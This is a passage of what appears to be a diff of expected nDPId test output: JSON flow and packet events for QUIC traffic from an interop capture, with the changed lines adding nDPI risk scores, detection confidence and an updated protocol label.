H9chbLTQGT2spRUw6ZUEwVFq4In3Weuzal0iqS\/0+Qhc+H5LZTfRP3k77cm2bTwA3v9yZps\/N8GHeBgerU\/GibGyvQfEIGnBs4SP6XvADxPaOf9Do6K3NWxPainQ6ROxxs18RzpwAqfNwr4czNzHmge9hVsXC2jkjt+a3iuT2VTvtgYP\/gg3wHLLEejB8ULg0YDhFTSwR5yZE+PblWTw\/h1zub\/pMrOiBxxazdMQ6Cnlz1xT+HwIG9hofXF2+e7REuF5bc+tHJIAxGxRRDEZiMKISCqpeRlWCWzB2x1mmKE\/KOsosvWRujnwCM1KnVuycB6dQCV8X5XgqFkoCYNSzpxTxn5s75i07w6T3iQzjZ7RhS6EVLmvqncx43bMihbC16QzKChHTteVef548eeTYH\/HqbZPAD8YiWnymAmXsIshT9ZrxL58BUWA8AOTB75ExBEpSWvCr6cdH9tmHTnFX+iAHfgQ+SXuDcA8Yh6Ch37H7iJkjIlyFlV0xYK80\/8rLLX9Fi16hMEw4MsMSJoCvgH1JkfA2nunYMhjsU2UTxS5kbVKkx14WrqJvIAkV1s24F3JhhnfrjqaA\/+WQCy6FO4gWrpnAldrYzL2M62GkNRWliggV7ygB87oMNLaAmKZ5PPWr4N7Ua\/KkdB4nYZv97Cgzy\/7FwISfaGW02358adB++VWymI6DWtw2+GpWB3k0kCTmUYA6ScuXne\/RAGeAonjWWbVkNYIk9hKz39J2Uz8YIvzxBUfOGU8GZZmVIYhs+LqHfeGeKbbCDVrdghS8AtfkpMJaXaNuqlKxMd0+QmH708rOIK59+ExcbrFRuuFCV+Y2kBwCFjNISkM\/hxKEL3li6mt6HDE6ObfY03fEoJ8sHxvuyXUyqUrbYA+\/+769MwVZnJvR3BgYsDQ7yyssPJx61jOW9\/\/ZJaUpoeTMs+LvTpOaO3aOGoys7HzhFtjxPpaMeuy6J8rvRGlDmpFIbJDQSikU42BVwHFgIiJEdtXmpWvL6UjR9gEnH7F4leVc6kZRbkH8JQU7saam7b+aLACqy8QGiFKLZZ79Su9BVo3hXx4V\/a9UOG0fwWICYP2rWjoSlMM1D8LD3JyXD\/xHI05oU4AlfqIPRE\/pZQIZghaIHZV\/ga\/hvwGvtrr60MW42GcZ7safTYI3OMKFIcoVKABl6HRXDdV5P2Rt+B44fCqh8Rx5j1GHzSW\/rGFP+xPOA0hzb72SyDr1nPrWA2ufiZWLD7rTJqxk+zP0NWdN1W8Ig7keNnXWv4QL9x\/\/g=="}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434756,"flow_last_seen":1603816434756,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434756,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"3.121.242.54","src_port":53402,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02148{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1603816434756,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434756,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAOvlAAEARQxzAqAGAA3nyNtCaEVIE7JFKxgoKCgoILW5Ke\/Z2fngAAETSF+9lWl21JTgtfVHZ5XMFAV5iwNh8QJikNlPYLLcL257g14TEszj6j7gT+sZNJ3RW6GlkGKI0cLTiGhA4DZXSY2CRRkQV8aus3zX9x+wV2RPvN+4eYITQBIblhzLx6SrfCRaIuMd\/dIvuprgHzspSsGPsDVaFWE5RHWm8PvIf\/7WDS2AteLmXnCclnhwiNiESFMU\/JfLfx1BGNZvT2HLZlWqxE\/QH\/8leGOFh4OQdOMgDcrWH2aq0ZIEKOcT+22+SBNS+RXSivQkzWAWGACCn3yDlD4LrYX0EufA2pWqvz0bhI1bD1bMjQNQXTpb0IRYB\/IP9pUSfcl09eg\/8nkbY+WxJsi7\/OumDvzxFqxy1vKTBHoCkKcZU6KzCeDnpcN4UpeF\/P9Su7Hbnq6Oiu4kYT7w5TEYJlfr6hPZSINzK1N08yrm8sF5N1X+BgIp1nZKHO3z9qBo5uTSd7eUgib\/5hEBZVUjZfzcENhMxZ3iQWwxtVBdr1MPVUb\/fAHf\/LyB43r9qDPa9CjQlM9LQ10V7PuMS1mZ\/FoYoEt5+Lt+cJHI5bVFxc5jzohk+GAitdRUtpfiTuEwM1BTukQDiBma4oP3e14IOsjoG1G6JReouNpkBgpuToJ+jAbUrib7kmXzQdUA7kbNqdY9YbE3amA8AbTm+9U8XVMYkeWFdsFBWMWYdsARDe\/wNxFennwMBsN1VI\/Sf2kdpBwmikma9+VOfFyk1+k2sHTPIlSkVm3zjzWfLNM1PgYnwDxsauAlC6hmm0JtKmTtkv+Pn\/\/bRNz47TPwG\/lMWs1GWc\/Duiv2CyU27DrRqkZl9eIkxpCPq+lhf64B8FwAcAY126ezwgYeSIj\/2BPVLzj6uWaHdPFiHkcYmsVRVcNxcn7SbmC6vMu39440UH8ewpx4045LjoYhYGYD9wbNo\/kPCLdYB5lMNkMJTlPPmNe98ODz2WRVDN9gK0zjD8fscveFE1Bpk8Tltq8z87BasUF4e83PNj3KD2dMD7X3GtxvbnR3cIGT3a57NON24InRM\/nwZHwL2bk877r1hTuhvugTQiJQZIW+R7Cd76AgAWAnog5NJv6qFjoKKfxT4AV2tDLzRyjkMMrHebIWYVqs1aklZ5d7wxUYLamAar0CN+WpRkYSzgamBAcwe7BSMa1vimlqjo\/6IlbVmFAty4ZoLhk1JPUo0OTDJGfg7G5ACascLpelBjrrhC8q2UQKF8audmNUZRXmNP+namQx8VwfIgH5YHylOs57ZtHfGy6hvAJo\/Tqvp\/umN87FBHWfLNRT8fGjmReoFRPTt1LBgsiQauA98uLlL\/MhK3zSkvFJb8TpBWg0yrTs+EkEfcIYy\/54O1JGnSBS8+4f\/1DKIa1jmhY4F7hcK\/Y\/Zi33FgbmmvzZ+cspy2SIEhxePsUH3DOdZcJPxMiL9n2teu3XWpEwymkPM3I7Kauv6WrFEPbeyTEqbxV\/7RpTQ21VJA+vSCdBrxnvlGaubOeoQaS4+J\/ugEvRReICuHUPNCmQAnXPbJmcvvOj5p4u5B1t7PBGR3R1kOZNNBIvoThwX9CAlMfPhMMsjct7r8pVUeMkYfmNf8DVqscAvJ5\/vInV2if80iUDSzxy3mS373dztl6IVts0qx7XYaK5V4uL6xfDViQ=="}
-00890{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434756,"flow_last_seen":1603816434756,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434756,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"3.121.242.54","src_port":53402,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"ietf.akaquic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+01011{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434756,"flow_last_seen":1603816434756,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434756,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"3.121.242.54","src_port":53402,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"ietf.akaquic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 02145{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1603816434756,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434756,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAwbRAAEAR5e\/AqAGAwb4KYsH6AbsE7NgwygoKCgoIc5O0PcfI+J8AAETSgTdR0pp7ROFzny7v80GZO+tdgWE1YYvBBVpTfYCLLZ9LR2R\/NMsrhl9CtsbdCKSqQlM9jeDSd7avtFbwkZgUMsGjQSFGIrauocKoeR\/IYUv\/3yqId1gln9QOjFOA7Vx3pZz\/40HjTDz++wnocf0Q7LKFbnIVVlAkyHprEOHxkx31yKlE1OrKPFXX64LJtMBzJGNe1ikJ4DBZc3CxM4VAmWh6jZ6Xziu1T48Y9Jp1rXJLZkDZluz9DNypT19E9aFE2QAE2YffnA08t2CC0Dav\/nelE7OXLvT3\/abxcTvv6lkWQ7Ws\/OGhflJV6pbd8DOAJlm41dw48U7866L\/ZVnZQGhC+qy29Rf0f9z7LTwYqeUnFBlTnrWIJUDejmyBK0xmX71p+M4ZDQYk6ksEN7ys9IhEK+0Ik4NF3m6iw+Y3srEwTIzK7SMuEUaqxHAnsnY0cY7xUBPiPgfPBbiLOeDS23803rHtAW6t+pcVbYzcUhLC5i4Fhsy5HB7swuOTaDalPrb1ks0Osqlmdnwi+VtFXIfWY5hiA\/takn+M6zgv2Z5TIeGz5PwD\/mNhYevqBSzxfqtF6pqWG4u\/KRjbRiKsndJKZWqgEurVo18heo2c6BuDo0f63l9uVIrESW645Q3fwcjj5n0WWKE8\/gOmB1q+Qfeb5YwzG2mkb0uuRf1dVhHaEpflcJ4\/TP64ezBPm2PEqdUJ98ani+HAdCRefhilKHlZCp8FaM0g6fLSIWNKgyXd08cPKg3kQr1QKPyCDeevRCjLROEYKMQBfMcVsYelRUae3sfcDjOm3duGl9ZwBYRTuhqBGmO8BgPbJTCOUP3SnFPjNHZReb65nPAq5CmaErExRB3aqj2X70FK4POxZDcdB2SCLeNQjD0gAdoPMDjy6TU8QbOW6emahG\/pm2XLGB82paRNLQ1UrajFFljlEad6px4jnFkmQswkS1ZCAcPuyjYtBQOoVyU6Jn8IET5bSZAQYtSzhJcRSsotN89chVt8BOmx9WoAiAY6LsHVmGCH8fyiVJ8R96liGv\/mCcZB6Oi41IwhqNraSx\/YHNb8PDeqgVZnzU7HOxgMto9BkhGXVAa\/MDhpy7ONbZFtXLugZH\/GeA4uKx4T\/QjSGOy8\/I8tKHhy1ciKQVx\/4efbfMnze1\/7wiD29p7nKFEe8jhCs0tUTtvbs5svZDkGpMLh\/X4M8hVxSKoXJ4GInFSKgl6TdVamGbNzyLxWmQUTAYnTn24BPh82ABwBHi8IX8bKxOnTE9ArtO1ncpBuGK6utDYd+flGgrwW8Kx3EAqCtI+xt3hxI1lVVBS5mqinEpT4rI7UFt6bivyn3w8QLN2BAypCK2nDcT4jrgs2l16Qbqcq5B1aHCyILvPoswAdCLirW7pESSTDoJJLaY3+F0tLUXrHW1QCvM\/i6MkbViFrAX1Wv2DuS4QGedw\/jPkFjn0PVCpFH1LNlSl\/mq7ojJPIzqm4YoISxxdl92D1MuRAOkcGfHDjHzu2gXU4R2SOjkBJKT78Z0m14Jd3agw7f8zNErlWf3mQN\/cPgefBr3GQB\/5hkj9h7mtqO0XsqbQtHpUzt2Y\/IzySgy2h3inpKHrAmHMy7nBwaqDcL8noSXoChoeTFZAF+yuWHR0EPcyX\/dJQEW5Avw=="}
 00641{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":93,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434764,"flow_last_seen":1603816434764,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434764,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","src_port":53140,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1603816434764,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1603816434764,"pkt":"pJGxgjQ5PKn0qB\/sht1gAVbOBNgRQCABCwcKydWupNP+R2kegH0gAUgAeBcBAb52Tv\/+BGMdz5QRUQTYJfbICgoKCghA0fDpGJ\/Z4QAARL42MmGE7LT7K7Ql+V7EQ3yWatv5MRpdEw0GoTR5NQSX65ds5UbmlVEnPiT6ugJBO3avrGIdm9NfC0YolC+M7h3Dd+R8rmFmbMufRy7tEXwOSANvtASfChD2QtW7IUdoUpURW\/ybH6H3HL74XAiUZ9DaKTFRCIGfbZdMWt8ZGjlM+G0uKJJyI4UiXMqUmldhkusW7Dkb3B5PhdsU4l\/\/nXb1ocHMF5ZO15qTuXpuDw3KLbi7Dk3CU80ZSrgIQRr4QnZY7DqaQqaTgqwsAdQp1wPEsQudwtV3+rldfGptoheCDmbpY8ruZrzgIcViEvjU5I9Ku4MmOSDc008VMVo6UbKXAY8wBkNppH+gKT0zKsJbuYos09RElJKJM+JRSvAd13BS3pf5yKPRjvg+VG7dJIXDCpCzd5HB88akDiSNSvnw\/1jpXEBSCG8CQobh6IKIU7erWpgWufuC2MUeTsj93wERw28DYyL4pZ0SgYLM8R+IuAUGggiToLnDY0lhnQxvWPEyOUmn4NJbPGX\/ycsndCFcb9Jll9Txp36+98fi41gKI+rpvius3\/7rHwBBIC53Dc9XI1Li53E\/tYF3PSb\/g4tqh7YqeuJqy592nH72H7zhGojy0gwXJQ\/hWtpj34Umy89wdwne1tmBbDTsm\/OVEe2Hv8wX1eUxdtqxfSQcfE5EjCaX8x5TsLMsFiA+gnimL9YXpXbCar82EARe4s\/1NGbcVosoctM9nH774rkUWziya9xnPI59V8iborTptEZmzs9opsMwWCSG3SUoMF+XgWmJrobGMEBNgQ6NuDdRKVGnCOz5ViUV8HOdhxWdLar9arspdIIQioDF1eMysE8I5ZwvEkpGFpxtL8pSwMYHtvi38MARaK84JW5F4Q+Z9NKUbjEnyJk4DLBXQDZCAccejGxLIlAEw9mV\/SQqwWMDKPfcgeBYaGkjuKCt9IwYkKfJdCAHGlWbthDy9UAYdzWaLgrHKDwv7KjG08gxv3P2Ay64L+MkxpWRZB3zlpP7475UXQoo5J2b\/TCDguBRfBA\/zwH0ywx+bAC1xX58ocUBgtutOfF0Vqf9ZXqQdWJ\/tYbtk2qPb\/vUKDkYspG2+VZV3S4mHyGQEdK+3+Br++sSHMrwkXpKY231omxX2tF0BL0Bxb\/XFoQnF0zVMDi6yl7EdOkVYJKzpCkpByrrFblgbC6aH5tGZmLBBsnQ9oNmcYgP6L4\/rCjc9wp9OI6Dpp\/kCf0+0QdRr65NauWVYS3fzTceAW7h1rV7piIkaCm\/ktLnQ0CjV4yXbM4EAQ\/1J3s6F5an9AUjsSqU7bHdat7EQLbygAV3b2dabdxj5om9WQRt0joYLuxTvD8zwyOedLxW1wTxiQF1SimJGbjZ\/VbtHbirvwE3YrWoKzszq610qQdSeVcciVMkJn8\/frGZPOF+kV+ihka4sCmdlV4EIQk1LeOGrlYlQ6fpIafv8Fxge7YrHQDBRMDZfuEMvNEoQTdfeyjVZwZQIQqYpN1426QLcvTfeGNyVfnI\/BbfhWbK8vegWPhhtQELUYrkCHe43wuMJDkpCyHET\/GRFZPr3UO+sKZLIuMEzbgtFP8BywWzvtpZIPTbuoW\/fNEsBA9hvwy1MQ=="}
-00937{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434764,"flow_last_seen":1603816434764,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434764,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","src_port":53140,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.ogre.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434764,"flow_last_seen":1603816434764,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434764,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","src_port":53140,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.ogre.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":94,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434765,"flow_last_seen":1603816434765,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434765,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","src_port":57926,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02150{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1603816434765,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434765,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAU3xAAEARXwnAqAGAjOM0XOJGEVIE7OZyxwoKCgoIVNEfWrpr6t8AAETShzjiz2D78m1qpQ+wdRdnpG0LI97NN9w\/zKLTNwbycXDRt9x16mx5gVIiYU9my7Ewd3ZQMG74RKzp5yqjf1swV34ZhT\/6a6RECEeuXIhfq5HIaUvnylxvuq5Ar2tLEHKFSp+lL3+2mCGKG\/aNYIIMA9OUhG2opUeuB2l5mNW6BfknYi6bDFHQDD1kdTaXvzq60RpfCfERji\/a12lQL6ybflc1AUHJdy355ohjy1PIdK24siM83Pzy3WhuqqXhu48NlkiWBwzRIc3QwNG05XWtibPZpt+rnEgQ+dX5n3b+VdVkbT1SCRuZXy4KNB1O35Lr9kd9\/8w+iJRgvFGDJ1gPEsh0qR0CocMn8hmur7qxG29GbjVMp7R1NSj2eAOtmvYpLRwpEXgHuZyaQ1wjCTKff2\/madFWTA4XUYv4fZGglZSmwIF\/drNbz5S3P\/iWcoMFEHkI4sVFj9ZYFd4B3L8Ih2KOMfq0bJT\/WfJrXj4M4zI4ZrVBE7HjqFO+Xl4tQchegf9m36aJmP9rCIyTgms9JLdAWw4p9HwzAtYzEsN7etsiFMbBGYxWytAD85x3V9BiLZ0tRaEDbZVSI3dKqLBjOACNgGbIysz\/M5PX6bbnVEJL+rpXP4dfmzf\/vyIoXSLGK\/35Ot0RpvgHsUdk1M1JiJ\/w0LW\/ca8oRdqHyGl\/0OHcNoRXWU9uCpfJhoCR17fY7d\/8uGaioJukkywUyDy4lEoJon8wuutdoFaZ2G1NQYMqLk2L9BSwK6uXlh\/KFqoktCfkCzS\/xf+XdyqvzCmUAccDyVcTW2Lvm6Iydjjcz17WgP2sboaA9M+jrUXfYeNBGU+gooCH\/ra1qqj6hZV+ycQaUnNe1GLXG68adoCLMAH3j+oxneUkPOBiO5E\/EF5WMPYRqDPOKxnvKYyV0lEoyBg27SjzbmIsvSP3tH7+YEc5r+OkK5iuBgQnkGchz2TXPmjupTCg7Xojg+c2Vl21XIeYUg5zp5dqk+Dg1R9d\/NVFrsh0doLMsqN8QHWUOatOJlm\/\/hWn7+iCSCBW1hRFoljw2OaG0E\/WHGtKJCH2ZhTW\/OlsWDZ1I6a9AalNu2a3QLqufVsas9PvBAL98YjcgSJ2vBIk\/BVRBpG1Q\/rHLLGdBQB\/\/fZj9y5wySLqEy0sx93+y3Y1YIBdxSNqeVQx\/fJpwJre6YpAYG9B9bZ\/BhXdwe1PHHhhhh+Tc0H6ljXzAZf5EDPA4QtQAjr8TpYSQuwb\/souaXFbGTPfik1Mu8mHXJ7chWN7BzwY6WVcDvctTf5wcun\/ot9mUzugsNNaZfRJbJao7Y6eGCUXHAEDWUWwm6eFYQim4\/i3o6CdH9tbSa5KMv36T6nVCkpY+qDyBJdXUmrtiozwIoULbVWC7vKc4k21qmL36sDhhn10y6PN4bIg1\/diWwWYCyWvERVVVw+kY2BYCLC6p8eQ4ktUYbvTDjH7p17NqO7ef3HSSFWp67hCGKfd+ge3gy9+0Ke6znAKoZn3gft7e4Qngv6MCc\/8gqKo6NfPX0NUiWvPO5U1BDl2yWaNt0QFBBfKLxj+uxMZfebHky9N1aDOeVaIQ9eYOanbE2+OeMk1d8+h4d5hGTbyyYZ3xpCnfIP7rR2Q8OBY5Js9LjU+ch2BSmUmNfrrjQ=="}
-00891{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434765,"flow_last_seen":1603816434765,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434765,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","src_port":57926,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.examp1e.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+01000{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434765,"flow_last_seen":1603816434765,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434765,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","src_port":57926,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.examp1e.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 02147{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1603816434765,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434765,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUALHVAAEARX6PAqAGAKHC\/PLT+AbsE7IqdzwoKCgoIe34skUb\/aLsAAETSJwiqldCG5d2DtH8UDlA+BP\/n+Hka9N9gLDvV00Jk\/OgePJAsiH3HrqXWf6W0XTXk7Pu2p+CFv9C0iF2fTa1ifkWOzj7YZz+hGLr31Ia3KbnzB86fFFCNPLMCgtr6arstfjJ4xI\/CQupOIVcMsg4IO6vzq1hO5uX8ALX13N2Nd4Yxx9Z3IbnXFpgI6JLk1uKVCyweJMlz+LOrhN3PHNyVHIt6alONhgWpEqUlKgTnNS9lCZd9JNENA+veQK+6gvIe2KJWpJlHdMZNI+3fjJnabXQaUxPQIMc0ZI8dZFlz3L059EqhvD2lc8\/naUxdGHznqVZzO\/gUeKnLROfZL6yJDTZiKzf+md1VYLBmBSCdsuQZ7oHBg0w7SSzXTvhRTic8g6kHUcynm9My8rvP3N1cyhHeHYoVTI3hh1p6dM2epSa1QGAI6JHSwnUF1\/QgJ\/yLYnzwcGUMmDxb6+\/Vcoz11hXvHqUfteaUIZrZlPS0IAcPwJ9uUM82Vts2gh0ZtKy1HVF7COtP\/YC8n3yaj2Z4XCxABH1JI1+Gr7s05Sbt7Ydmm0MEi7M4Z7H69xe5sGopICwlQr6BDij0IG\/Q72anBTWx1VNl8l1hae+l8TMmxGeMu9i4blZH4yTZVGbr4Ufrnumx\/iFAYgWQeu6awy9bpeZT5O+xG+rCa2YUWvEwAHwQqGOTLiHRhLqf8bOiysObXTA3QmobJfgdxg\/kMNWj8xUdfAzQUKJYelBbMXT4qn\/A\/bgLMic4ksrxyPSpiS1e9XYY4TcxnGgHk5yxCxuwpm4+S16PEBC8SsJHkLxhM+Pyqg8ZbbK5FBImfMzUEZil15pbURRUjvlZtdskfSyAHSxSF8X4o0JXfUlol+bcOL6ItmB+wzIiN2Q+yijFIXK6d9190X\/aYna6Y1mhBOG0n2BfyedI+P25jlTZHPzLP\/m0eGz0ffpvLil2huLTMVVoPDTaIcLulULXUi1mSE5WxlWTpZdPkeFyxhOecT8BN8ugPHSRdq1YlgSaIwZavu\/XO8PCMiEMZUs7LNob+kHoiN1Yitx+SOUzM3Rfm4SCIMQokalKEYORgNek9yKJq9ysRafffBGVrxSm9fUQ2\/hXog43g3kKJn1+L45W1cDgEOnlzcbSC7mXNgzNI\/9oSvf+verPiM6qHPGSAL45mMH3aGyYMFRQjcVYI49Hhcw\/awYPgb\/M54nczqpco1saP+lU6ffHEwQVDtkjV\/GpfILnkEXC+cQL7juo\/ky491nkMGs1EkNmbbJTwPGVUqPiFcdi\/GoRziaE35KsbCh2pXltXGH77CIkJ8z4h3pP\/kBhLJUXL8fmE9AqMsqW5zCCDLfMDqTPSGLNgu12FdfjnQIvupRRH4Ge0\/B5Zgz1NMHbBts+RgS0Xaxftf2jPR3SxbRu77DVdYw9vVWXM\/R9b26Kxk+mp4fmYKTS6dblfvsoHkgHRfoRp\/1E4eszlorBw59xoTpzT7xgKofVDBGY48JKd52rimDD8\/5N908wmgggGjc\/EEPQbILqIqgEVu+rqihenG\/3x1vbCDXllpynW3aJnILkUHNWbpfDPatq0AQGgN8Op2ovkZNf\/lP0t4iCiUxmNrrEYAIJpsoCwFTBFOv6YhOZgAb9RxW9d3SCROp5nmqJ9Q=="}
